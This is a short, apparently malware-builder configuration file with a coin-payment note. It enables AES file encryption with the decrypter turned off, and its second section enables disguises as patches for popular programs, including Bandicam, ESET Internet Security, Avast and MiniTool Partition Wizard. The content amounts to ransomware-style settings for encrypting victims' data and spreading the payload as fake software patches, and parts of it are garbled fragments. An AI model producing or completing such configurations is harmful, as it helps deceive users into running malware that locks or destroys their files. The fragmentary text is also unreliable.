# Also MabelQuest uses Flokicoins.

crypt=true
return;0
decrypter=false
Corrupt=0;false;AES;9

# Can it disquise as many popular program patch.

Bandicam=1
ESETInternetSecurity=1
MiniToolPartitionWizard=1
AvastPremier=1
RDPGenerator=1
